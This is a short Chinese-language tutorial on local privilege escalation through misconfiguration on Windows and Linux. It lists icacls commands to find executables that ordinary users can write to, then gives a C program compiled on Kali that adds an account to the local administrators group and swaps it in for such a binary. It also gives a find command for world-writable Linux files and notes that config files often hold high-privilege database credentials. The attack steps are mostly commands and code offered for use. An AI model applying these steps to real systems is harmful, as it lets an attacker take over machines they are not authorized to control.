前言
与漏洞相比
利用配置不当更常用
以下情况漏洞就很难有效:
- 企业环境
- 补丁更新的全部已经安装
而配置不当:
- 输入变量过滤之外更值得研发关注的安全隐患
- 有些程序会以system权限启动
1、windows
NTFS权限允许users修改删除:
寻找一个文件
其安全栏user组有写入权限
将该文件换成反弹shell
03以后的win中存在icacls,可以拷贝到xp中
C:\>icacls boot.ini #查询boot.ini的用户权限
boot.ini BUILTIN\Power Users:(RX)
BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
Successfully processed 1 files; Failed processing 0 files
# 如果 user 用户拥有 F(FULL)权限,则可以直接控制系统
C:\>icacls c:\windows\*.exe /save saveicacls /T # 查询各exe程序的权限情况并存入saveicacls.txt,/T进行遍历
#BU:build user
#PU:power user
#BA:build administrator
#如果 BU 是 F 的话,则说明可以替换
#如果出现 FA;;;BU,则说明权限配置不当
执行以上命令
寻找到合适的文件
然后在kali里:
root@kali:~# i686-w64-mingw32-gcc -o admin.exe admin.c #编译一个win中执行的exe
其中
脚本admin.c
#include <stdlib.h>
int main()
{
int i;
i = system("net localgroup administrators a /add"); #当前用户添加到当前用户组
return 0;
}
将admin.exe拷贝到win中
用admin.exe替换上面找到的有F权限的程序
然后目标机运行被替换程序时
我们控制的用户就能从user提升到admin
2、linux
find / -perm 777 -exec ls -l {} \; #把所有rwx权限的文件找出来
然后一样替换
3、应用系统的配置文件
有时候都不用太多操作
在应用连接数据库的配置文件里会有权限极高的后台服务运行账号和密码
收集信息时说不定就找到了
这听起来很离谱
但是现实中存在的
结语
在案例里
因配置不当
导致攻击者获取高权限
比比皆是
需注意